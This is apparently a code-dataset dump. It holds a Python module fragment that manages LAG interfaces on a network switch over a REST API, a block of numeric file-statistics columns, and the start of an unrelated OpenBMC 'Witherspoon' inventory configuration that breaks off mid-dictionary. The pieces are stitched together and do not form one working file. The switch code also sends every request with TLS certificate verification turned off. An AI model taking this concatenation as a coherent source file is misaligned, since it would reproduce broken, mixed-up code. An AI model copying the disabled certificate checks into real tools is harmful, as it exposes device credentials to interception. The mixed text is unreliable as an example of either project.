        if not common_ops._response_ok(response, "POST"):
            logging.warning("FAIL: Adding Interface table entry '%s' failed with status code %d: %s"
                            % (name, response.status_code, response.text))
            return False
        else:
            logging.info("SUCCESS: Adding Interface table entry '%s' succeeded" % name)
            return True
    else:
        logging.info("SUCCESS: No need to add Interface table entry '%s' because it already exists"
                     % name)
        return True
def _update_l2_lag_interface(name, mc_lag=False, fallback_enabled=False, **kwargs):
    """
    Perform GET and PUT calls to update the Interface table entry for L2 LAG interface.
    :param name: Alphanumeric name of LAG Port
    :param mc_lag: Boolean to determine if the LAG is multi-chassis. Defaults to False if not specified.
    :param fallback_enabled: Boolean to determine if the LAG uses LACP fallback. Defaults to False if not specified.
    :param kwargs:
        keyword s: requests.session object with loaded cookie jar
        keyword url: URL in main() function
    :return: True if successful, False otherwise
    """
    encoded_name = common_ops._replace_special_characters(name)
    payload = interface.get_interface(name, 1, "writable", **kwargs)
    # Dictionary-valued reference fields must be converted back to the
    # list form before the entry can be PUT back.
    for field in ('interfaces', 'vlan_trunks'):
        if payload[field]:
            payload[field] = common_ops._dictionary_to_list_values(payload[field])
    if payload['vlan_tag']:
        # Convert the dictionary to a URI string
        payload['vlan_tag'] = common_ops._dictionary_to_string(payload['vlan_tag'])
    payload['other_config']['mclag_enabled'] = mc_lag
    payload['other_config']['lacp-fallback'] = fallback_enabled
    target_url = kwargs["url"] + "system/interfaces/%s" % encoded_name
    put_body = json.dumps(payload, sort_keys=True, indent=4)
    response = kwargs["s"].put(target_url, data=put_body, verify=False)
    if common_ops._response_ok(response, "PUT"):
        logging.info("SUCCESS: Updating LAG Interface entry '%s' succeeded" % name)
        return True
    logging.warning("FAIL: Updating LAG Interface entry '%s' failed with status code %d: %s"
                    % (name, response.status_code, response.text))
    return False
# NOTE(review): ``create_l3_lag_interface`` is defined twice in this module
# with identical bodies; this first definition is shadowed at import time by
# the duplicate that follows it and is therefore dead code — one of the two
# copies should be removed.
def create_l3_lag_interface(name, phys_ports, ipv4, lacp_mode="passive", mc_lag=False, fallback_enabled=False,
                            desc=None, admin_state="up", vrf="default", **kwargs):
    """
    Perform a POST call to create a Port table entry for L3 LAG interface.
    :param name: Alphanumeric Port name
    :param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
    :param ipv4: IPv4 address to assign to the interface. Defaults to nothing if not specified.
    :param lacp_mode: Should be either "passive" or "active." Defaults to "passive" if not specified.
    :param mc_lag: Boolean to determine if the LAG is multi-chassis. Defaults to False if not specified.
    :param fallback_enabled: Boolean to determine if the LAG uses LACP fallback. Defaults to False if not specified.
    :param desc: Optional description for the interface. Defaults to nothing if not specified.
    :param admin_state: Optional administratively-configured state of the port.
        Defaults to "up" if not specified
    :param vrf: Name of the VRF to which the Port belongs. Defaults to "default" if not specified.
    :param kwargs:
        keyword s: requests.session object with loaded cookie jar
        keyword url: URL in main() function
    :return: True if successful, False otherwise
    """
    if kwargs["url"].endswith("/v1/"):
        return _create_l3_lag_interface_v1(name, phys_ports, ipv4, lacp_mode, mc_lag, fallback_enabled,
                                           desc, admin_state, vrf, **kwargs)
    else: # Updated else for when version is v10.04
        return _create_l3_lag_interface(name, phys_ports, ipv4, lacp_mode, mc_lag, fallback_enabled,
                                        desc, admin_state, vrf, **kwargs)
# NOTE(review): this is an exact duplicate of the ``create_l3_lag_interface``
# definition directly above; because it appears later in the module, this
# copy is the one bound at import time. The duplication looks accidental —
# consider deleting one of the two copies.
def create_l3_lag_interface(name, phys_ports, ipv4, lacp_mode="passive", mc_lag=False, fallback_enabled=False,
                            desc=None, admin_state="up", vrf="default", **kwargs):
    """
    Perform a POST call to create a Port table entry for L3 LAG interface.
    :param name: Alphanumeric Port name
    :param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
    :param ipv4: IPv4 address to assign to the interface. Defaults to nothing if not specified.
    :param lacp_mode: Should be either "passive" or "active." Defaults to "passive" if not specified.
    :param mc_lag: Boolean to determine if the LAG is multi-chassis. Defaults to False if not specified.
    :param fallback_enabled: Boolean to determine if the LAG uses LACP fallback. Defaults to False if not specified.
    :param desc: Optional description for the interface. Defaults to nothing if not specified.
    :param admin_state: Optional administratively-configured state of the port.
        Defaults to "up" if not specified
    :param vrf: Name of the VRF to which the Port belongs. Defaults to "default" if not specified.
    :param kwargs:
        keyword s: requests.session object with loaded cookie jar
        keyword url: URL in main() function
    :return: True if successful, False otherwise
    """
    if kwargs["url"].endswith("/v1/"):
        return _create_l3_lag_interface_v1(name, phys_ports, ipv4, lacp_mode, mc_lag, fallback_enabled,
                                           desc, admin_state, vrf, **kwargs)
    else: # Updated else for when version is v10.04
        return _create_l3_lag_interface(name, phys_ports, ipv4, lacp_mode, mc_lag, fallback_enabled,
                                        desc, admin_state, vrf, **kwargs)
def _create_l3_lag_interface_v1(name, phys_ports, ipv4, lacp_mode="passive", mc_lag=False, fallback_enabled=False,
                                desc=None, admin_state="up", vrf="default", **kwargs):
    """
    Perform a POST call to create a Port table entry for L3 LAG interface.
    :param name: Alphanumeric Port name
    :param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
    :param ipv4: IPv4 address to assign to the interface. Defaults to nothing if not specified.
    :param lacp_mode: Should be either "passive" or "active." Defaults to "passive" if not specified.
    :param mc_lag: Boolean to determine if the LAG is multi-chassis. Defaults to False if not specified.
    :param fallback_enabled: Boolean to determine if the LAG uses LACP fallback. Defaults to False if not specified.
    :param desc: Optional description for the interface. Defaults to nothing if not specified.
    :param admin_state: Optional administratively-configured state of the port.
        Defaults to "up" if not specified
    :param vrf: Name of the VRF to which the Port belongs. Defaults to "default" if not specified.
    :param kwargs:
        keyword s: requests.session object with loaded cookie jar
        keyword url: URL in main() function
    :return: True if successful, False otherwise
    """
    ports_list = port.get_all_ports(**kwargs)
    port_name_percents = common_ops._replace_special_characters(name)
    if "/rest/v1/system/ports/%s" % port_name_percents not in ports_list:
        # Extract LAG ID from LAG name (raw string avoids the invalid
        # escape-sequence warning for \d).
        lag_id = int(re.search(r'\d+', name).group())
        # For each port, add LAG ID to the Interface table entry, and delete the Port table entry
        for phys_port in phys_ports:
            interface.add_port_to_lag(phys_port, lag_id, **kwargs)
        interfaces = ["/rest/v1/system/interfaces/%s" % common_ops._replace_special_characters(phys_port)
                      for phys_port in phys_ports]
        port_data = {"admin": admin_state,
                     "interfaces": interfaces,
                     "name": name,
                     "routing": True,
                     "vrf": "/rest/v1/system/vrfs/%s" % vrf,
                     "ip4_address": ipv4,
                     "lacp": lacp_mode,
                     "other_config": {
                         "mclag_enabled": mc_lag,
                         "lacp-fallback": fallback_enabled
                     },
                     }
        if desc is not None:
            port_data['description'] = desc
        # NOTE: "ip4_address" is already set in port_data above; the original
        # code re-assigned it here when ipv4 was not None, which was a no-op
        # and has been removed.
        target_url = kwargs["url"] + "system/ports"
        post_data = json.dumps(port_data, sort_keys=True, indent=4)
        response = kwargs["s"].post(target_url, data=post_data, verify=False)
        if not common_ops._response_ok(response, "POST"):
            logging.warning("FAIL: Adding Port table entry '%s' failed with status code %d: %s"
                            % (name, response.status_code, response.text))
            return False
        else:
            logging.info("SUCCESS: Adding Port table entry '%s' succeeded" % name)
            return True
    else:
        logging.info("SUCCESS: No need to add Port table entry '%s' because it already exists"
                     % name)
        return True
def _create_l3_lag_interface(name, phys_ports, ipv4, lacp_mode="passive", mc_lag=False, fallback_enabled=False,
                             desc=None, admin_state="up", vrf="default", **kwargs):
    """
    Perform a POST call to create an Interface table entry for an L3 LAG interface (v10.04 API).

    :param name: Alphanumeric Port name
    :param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
    :param ipv4: IPv4 address to assign to the interface. Defaults to nothing if not specified.
    :param lacp_mode: Should be either "passive" or "active." Defaults to "passive" if not specified.
    :param mc_lag: Boolean to determine if the LAG is multi-chassis. Defaults to False if not specified.
        NOTE: currently unused -- sending 'other_config' caused the POST to fail on this API
        version, so the setting is not transmitted. Kept for interface compatibility.
    :param fallback_enabled: Boolean to determine if the LAG uses LACP fallback. Defaults to False
        if not specified. NOTE: currently unused for the same reason as mc_lag.
    :param desc: Optional description for the interface. Defaults to nothing if not specified.
    :param admin_state: Optional administratively-configured state of the port.
        Defaults to "up" if not specified
    :param vrf: Name of the VRF to which the Port belongs. Defaults to "default" if not specified.
    :param kwargs:
        keyword s: requests.session object with loaded cookie jar
        keyword url: URL in main() function
    :return: True if successful, False otherwise
    """
    ints_dict = interface.get_all_interfaces(**kwargs)

    if name not in ints_dict:
        # Extract the numeric LAG ID from the LAG name (e.g. "lag10" -> 10).
        # Raw string avoids the invalid '\d' escape warning on modern Python 3.
        lag_id = int(re.search(r'\d+', name).group())

        # For each port, add LAG ID to the Interface table entry, and delete the Port table entry
        for phys_port in phys_ports:
            interface.add_port_to_lag(phys_port, lag_id, **kwargs)

        interfaces = ["/rest/v10.04/system/interfaces/%s" % common_ops._replace_special_characters(phys_port)
                      for phys_port in phys_ports]

        int_data = {"admin": admin_state,
                    "interfaces": interfaces,
                    "name": name,
                    "type": "lag",
                    "vrf": "/rest/v10.04/system/vrfs/%s" % vrf,
                    "routing": True,
                    "ip4_address": ipv4,
                    "lacp": lacp_mode,
                    # 'other_config' (mclag_enabled / lacp-fallback) intentionally omitted:
                    # including it caused an error from the REST API on this version.
                    }

        if desc is not None:
            int_data['description'] = desc

        target_url = kwargs["url"] + "system/interfaces"
        post_data = json.dumps(int_data, sort_keys=True, indent=4)

        response = kwargs["s"].post(target_url, data=post_data, verify=False)

        if not common_ops._response_ok(response, "POST"):
            logging.warning("FAIL: Adding Interface table entry '%s' failed with status code %d: %s"
                            % (name, response.status_code, response.text))
            return False
        else:
            logging.info("SUCCESS: Adding Interface table entry '%s' succeeded" % name)
            return True
    else:
        logging.info("SUCCESS: No need to add Interface table entry '%s' because it already exists"
                     % name)
        return True
def delete_lag_interface(name, phys_ports, **kwargs):
    """
    Perform a DELETE call to delete a LAG interface. For v1, also remove the LAG ID from the port's Interface,
    and create the associated Port table entry.

    :param name: Alphanumeric name of LAG interface
    :param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
    :param kwargs:
        keyword s: requests.session object with loaded cookie jar
        keyword url: URL in main() function
    :return: True if successful, False otherwise
    """
    # Dispatch on the REST API version embedded in the base URL.
    if kwargs["url"].endswith("/v1/"):
        handler = _delete_lag_interface_v1
    else:
        # Any non-v1 URL is treated as the v10.04 API.
        handler = _delete_lag_interface
    return handler(name, phys_ports, **kwargs)
def _delete_lag_interface_v1(name, phys_ports, **kwargs):
    """
    Perform a DELETE call to delete a LAG interface. Also, for each physical port, create the associated Port table
    entry, and remove the LAG ID from the Port and Interface entries by initializing them to default state.

    :param name: Alphanumeric name of LAG interface
    :param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
    :param kwargs:
        keyword s: requests.session object with loaded cookie jar
        keyword url: URL in main() function
    :return: True if successful, False otherwise
    """
    ok = interface.delete_interface(name, **kwargs)
    # Re-create each member's Port table entry, then reset Port/Interface state to drop the LAG.
    # Once any step fails, skip every remaining REST call (same short-circuit as 'and' chaining).
    for member in phys_ports:
        if not ok:
            break
        ok = interface.add_l2_interface(member, **kwargs)
        if ok:
            ok = port.initialize_port_entry(member, **kwargs)
    return ok
def _delete_lag_interface(name, phys_ports, **kwargs):
    """
    Perform a DELETE call to delete a LAG interface. Also, for each physical port, remove the LAG ID from the Interface
    entries by initializing them to default state.

    :param name: Alphanumeric name of LAG interface
    :param phys_ports: List of physical ports to aggregate (e.g. ["1/1/1", "1/1/2", "1/1/3"])
    :param kwargs:
        keyword s: requests.session object with loaded cookie jar
        keyword url: URL in main() function
    :return: True if successful, False otherwise
    """
    ok = interface.delete_interface(name, **kwargs)
    # Reset each member's Interface entry; stop issuing REST calls after the first failure
    # (matches the short-circuit behavior of chained 'and').
    for member in phys_ports:
        if not ok:
            break
        ok = interface.initialize_interface_entry(member, **kwargs)
    return ok
| 48.252588
| 123
| 0.648846
| 3,175
| 23,306
| 4.617323
| 0.064252
| 0.018076
| 0.045839
| 0.06221
| 0.939086
| 0.924284
| 0.907026
| 0.892633
| 0.878854
| 0.872306
| 0
| 0.012194
| 0.261092
| 23,306
| 482
| 124
| 48.352697
| 0.839092
| 0.436669
| 0
| 0.742081
| 0
| 0
| 0.160736
| 0.026144
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049774
| false
| 0.031674
| 0.027149
| 0
| 0.190045
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6abaa6dd865776b0aef97c49582983bda9e2861a
| 121
|
py
|
Python
|
docknv/project/__init__.py
|
sharingcloud/docknv
|
6eec6a576a32cb05278b7af045f90859066c9f1d
|
[
"MIT"
] | null | null | null |
docknv/project/__init__.py
|
sharingcloud/docknv
|
6eec6a576a32cb05278b7af045f90859066c9f1d
|
[
"MIT"
] | null | null | null |
docknv/project/__init__.py
|
sharingcloud/docknv
|
6eec6a576a32cb05278b7af045f90859066c9f1d
|
[
"MIT"
] | null | null | null |
"""Project module."""
from .models import * # noqa
from .exceptions import * # noqa
# from .methods import * # noqa
| 17.285714
| 33
| 0.644628
| 14
| 121
| 5.571429
| 0.571429
| 0.384615
| 0.358974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.214876
| 121
| 6
| 34
| 20.166667
| 0.821053
| 0.46281
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6ae00fc6e4ad0d83dd30c30a08b1f5af4d6b9a67
| 23,023
|
py
|
Python
|
data/Witherspoon.py
|
warp5tw/openbmc-test-automation
|
9c85c2df6cbacbd48c7c4962aef39e03814932cc
|
[
"Apache-2.0"
] | 5
|
2021-10-07T15:36:37.000Z
|
2022-03-01T07:21:49.000Z
|
data/Witherspoon.py
|
warp5tw/openbmc-test-automation
|
9c85c2df6cbacbd48c7c4962aef39e03814932cc
|
[
"Apache-2.0"
] | null | null | null |
data/Witherspoon.py
|
warp5tw/openbmc-test-automation
|
9c85c2df6cbacbd48c7c4962aef39e03814932cc
|
[
"Apache-2.0"
] | 1
|
2022-03-01T07:21:51.000Z
|
2022-03-01T07:21:51.000Z
|
#! /usr/bin/python

# System states
#   state can change to next state in 2 ways:
#   - a process emits a GotoSystemState signal with state name to goto
#   - objects specified in EXIT_STATE_DEPEND have started
# Ordered list of state names; order follows the power/boot sequence from
# base applications up through host power-off.
SYSTEM_STATES = [
    'BASE_APPS',
    'BMC_STARTING',
    'BMC_READY',
    'HOST_POWERING_ON',
    'HOST_POWERED_ON',
    'HOST_BOOTING',
    'HOST_BOOTED',
    'HOST_POWERED_OFF',
]
# Per-state object paths (presumably D-Bus -- confirm against the state
# manager) that must have started before the named state can be exited;
# this is the second transition mechanism described above.
EXIT_STATE_DEPEND = {
    'BASE_APPS': {
        '/org/openbmc/sensors': 0,
    },
    'BMC_STARTING': {
        '/org/openbmc/control/chassis0': 0,
        '/org/openbmc/control/power0': 0,
        '/org/openbmc/control/flash/bios': 0,
    },
}
# Inventory layout: maps each inventory object path to its FRU metadata.
# 'is_fru' marks field-replaceable units; 'present': "True" (a string, as
# written) marks items recorded as always present.
FRU_INSTANCES = {
    '<inventory_root>/system': {'fru_type': 'SYSTEM', 'is_fru': True, 'present': "True"},
    '<inventory_root>/system/bios': {'fru_type': 'SYSTEM', 'is_fru': True, 'present': "True"},
    '<inventory_root>/system/misc': {'fru_type': 'SYSTEM', 'is_fru': False, },
    '<inventory_root>/system/chassis': {'fru_type': 'SYSTEM', 'is_fru': True, 'present': "True"},
    '<inventory_root>/system/chassis/motherboard': {'fru_type': 'MAIN_PLANAR', 'is_fru': True, },
    '<inventory_root>/system/systemevent': {'fru_type': 'SYSTEM_EVENT', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/refclock': {'fru_type': 'MAIN_PLANAR', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/pcieclock': {'fru_type': 'MAIN_PLANAR', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/todclock': {'fru_type': 'MAIN_PLANAR', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/apss': {'fru_type': 'MAIN_PLANAR', 'is_fru': False, },
    '<inventory_root>/system/chassis/fan0': {'fru_type': 'FAN', 'is_fru': True, },
    '<inventory_root>/system/chassis/fan1': {'fru_type': 'FAN', 'is_fru': True, },
    '<inventory_root>/system/chassis/fan2': {'fru_type': 'FAN', 'is_fru': True, },
    '<inventory_root>/system/chassis/fan3': {'fru_type': 'FAN', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/bmc': {'fru_type': 'BMC', 'is_fru': False,
                                                        'manufacturer': 'ASPEED'},
    '<inventory_root>/system/chassis/motherboard/cpu0': {'fru_type': 'CPU', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/cpu1': {'fru_type': 'CPU', 'is_fru': True, },
    # 12 cores per CPU; cores are sub-units of the CPU FRU, not FRUs themselves.
    '<inventory_root>/system/chassis/motherboard/cpu0/core0': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu0/core1': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu0/core2': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu0/core3': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu0/core4': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu0/core5': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu0/core6': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu0/core7': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu0/core8': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu0/core9': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu0/core10': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu0/core11': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu1/core0': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu1/core1': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu1/core2': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu1/core3': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu1/core4': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu1/core5': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu1/core6': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu1/core7': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu1/core8': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu1/core9': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu1/core10': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/cpu1/core11': {'fru_type': 'CORE', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/membuf0': {'fru_type': 'MEMORY_BUFFER', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/membuf1': {'fru_type': 'MEMORY_BUFFER', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/membuf2': {'fru_type': 'MEMORY_BUFFER', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/membuf3': {'fru_type': 'MEMORY_BUFFER', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/membuf4': {'fru_type': 'MEMORY_BUFFER', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/membuf5': {'fru_type': 'MEMORY_BUFFER', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/membuf6': {'fru_type': 'MEMORY_BUFFER', 'is_fru': False, },
    '<inventory_root>/system/chassis/motherboard/membuf7': {'fru_type': 'MEMORY_BUFFER', 'is_fru': False, },
    # 32 DIMM slots, all field-replaceable.
    '<inventory_root>/system/chassis/motherboard/dimm0': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm1': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm2': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm3': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm4': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm5': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm6': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm7': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm8': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm9': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm10': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm11': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm12': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm13': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm14': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm15': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm16': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm17': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm18': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm19': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm20': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm21': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm22': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm23': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm24': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm25': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm26': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm27': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm28': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm29': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm30': {'fru_type': 'DIMM', 'is_fru': True, },
    '<inventory_root>/system/chassis/motherboard/dimm31': {'fru_type': 'DIMM', 'is_fru': True, },
}
# Numeric/string ID to object-path lookup tables (the IDs are presumably
# IPMI FRU IDs, FRU-area record names, and sensor numbers -- confirm
# against the consuming service).
ID_LOOKUP = {
    'FRU': {
        0x01: '<inventory_root>/system/chassis/motherboard/cpu0',
        0x02: '<inventory_root>/system/chassis/motherboard/cpu1',
        0x03: '<inventory_root>/system/chassis/motherboard',
        0x04: '<inventory_root>/system/chassis/motherboard/membuf0',
        0x05: '<inventory_root>/system/chassis/motherboard/membuf1',
        0x06: '<inventory_root>/system/chassis/motherboard/membuf2',
        0x07: '<inventory_root>/system/chassis/motherboard/membuf3',
        0x08: '<inventory_root>/system/chassis/motherboard/membuf4',
        0x09: '<inventory_root>/system/chassis/motherboard/membuf5',
        0x0c: '<inventory_root>/system/chassis/motherboard/dimm0',
        0x0d: '<inventory_root>/system/chassis/motherboard/dimm1',
        0x0e: '<inventory_root>/system/chassis/motherboard/dimm2',
        0x0f: '<inventory_root>/system/chassis/motherboard/dimm3',
        0x10: '<inventory_root>/system/chassis/motherboard/dimm4',
        0x11: '<inventory_root>/system/chassis/motherboard/dimm5',
        0x12: '<inventory_root>/system/chassis/motherboard/dimm6',
        0x13: '<inventory_root>/system/chassis/motherboard/dimm7',
        0x14: '<inventory_root>/system/chassis/motherboard/dimm8',
        0x15: '<inventory_root>/system/chassis/motherboard/dimm9',
        0x16: '<inventory_root>/system/chassis/motherboard/dimm10',
        0x17: '<inventory_root>/system/chassis/motherboard/dimm11',
        0x18: '<inventory_root>/system/chassis/motherboard/dimm12',
        0x19: '<inventory_root>/system/chassis/motherboard/dimm13',
        0x1a: '<inventory_root>/system/chassis/motherboard/dimm14',
        0x1b: '<inventory_root>/system/chassis/motherboard/dimm15',
        0x1c: '<inventory_root>/system/chassis/motherboard/dimm16',
        0x1d: '<inventory_root>/system/chassis/motherboard/dimm17',
        0x1e: '<inventory_root>/system/chassis/motherboard/dimm18',
        0x1f: '<inventory_root>/system/chassis/motherboard/dimm19',
        0x20: '<inventory_root>/system/chassis/motherboard/dimm20',
        0x21: '<inventory_root>/system/chassis/motherboard/dimm21',
        0x22: '<inventory_root>/system/chassis/motherboard/dimm22',
        0x23: '<inventory_root>/system/chassis/motherboard/dimm23',
        0x24: '<inventory_root>/system/chassis/motherboard/dimm24',
        0x25: '<inventory_root>/system/chassis/motherboard/dimm25',
        0x26: '<inventory_root>/system/chassis/motherboard/dimm26',
        0x27: '<inventory_root>/system/chassis/motherboard/dimm27',
        0x28: '<inventory_root>/system/chassis/motherboard/dimm28',
        0x29: '<inventory_root>/system/chassis/motherboard/dimm29',
        0x2a: '<inventory_root>/system/chassis/motherboard/dimm30',
        0x2b: '<inventory_root>/system/chassis/motherboard/dimm31',
    },
    'FRU_STR': {
        'PRODUCT_0': '<inventory_root>/system/bios',
        'BOARD_1': '<inventory_root>/system/chassis/motherboard/cpu0',
        'BOARD_2': '<inventory_root>/system/chassis/motherboard/cpu1',
        'CHASSIS_3': '<inventory_root>/system/chassis/motherboard',
        'BOARD_3': '<inventory_root>/system/misc',
        'BOARD_4': '<inventory_root>/system/chassis/motherboard/membuf0',
        'BOARD_5': '<inventory_root>/system/chassis/motherboard/membuf1',
        'BOARD_6': '<inventory_root>/system/chassis/motherboard/membuf2',
        'BOARD_7': '<inventory_root>/system/chassis/motherboard/membuf3',
        'BOARD_8': '<inventory_root>/system/chassis/motherboard/membuf4',
        'BOARD_9': '<inventory_root>/system/chassis/motherboard/membuf5',
        'BOARD_10': '<inventory_root>/system/chassis/motherboard/membuf6',
        'BOARD_11': '<inventory_root>/system/chassis/motherboard/membuf7',
        'PRODUCT_12': '<inventory_root>/system/chassis/motherboard/dimm0',
        'PRODUCT_13': '<inventory_root>/system/chassis/motherboard/dimm1',
        'PRODUCT_14': '<inventory_root>/system/chassis/motherboard/dimm2',
        'PRODUCT_15': '<inventory_root>/system/chassis/motherboard/dimm3',
        'PRODUCT_16': '<inventory_root>/system/chassis/motherboard/dimm4',
        'PRODUCT_17': '<inventory_root>/system/chassis/motherboard/dimm5',
        'PRODUCT_18': '<inventory_root>/system/chassis/motherboard/dimm6',
        'PRODUCT_19': '<inventory_root>/system/chassis/motherboard/dimm7',
        'PRODUCT_20': '<inventory_root>/system/chassis/motherboard/dimm8',
        'PRODUCT_21': '<inventory_root>/system/chassis/motherboard/dimm9',
        'PRODUCT_22': '<inventory_root>/system/chassis/motherboard/dimm10',
        'PRODUCT_23': '<inventory_root>/system/chassis/motherboard/dimm11',
        'PRODUCT_24': '<inventory_root>/system/chassis/motherboard/dimm12',
        'PRODUCT_25': '<inventory_root>/system/chassis/motherboard/dimm13',
        'PRODUCT_26': '<inventory_root>/system/chassis/motherboard/dimm14',
        'PRODUCT_27': '<inventory_root>/system/chassis/motherboard/dimm15',
        'PRODUCT_28': '<inventory_root>/system/chassis/motherboard/dimm16',
        'PRODUCT_29': '<inventory_root>/system/chassis/motherboard/dimm17',
        'PRODUCT_30': '<inventory_root>/system/chassis/motherboard/dimm18',
        'PRODUCT_31': '<inventory_root>/system/chassis/motherboard/dimm19',
        'PRODUCT_32': '<inventory_root>/system/chassis/motherboard/dimm20',
        'PRODUCT_33': '<inventory_root>/system/chassis/motherboard/dimm21',
